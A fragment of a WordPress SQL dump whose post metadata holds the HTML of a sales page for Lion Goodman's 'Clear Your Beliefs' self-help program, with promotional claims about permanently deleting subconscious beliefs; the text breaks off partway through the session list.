(3811, 1941, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(3810, 1941, '_wpb_vc_js_status', 'false');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(3812, 3149, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	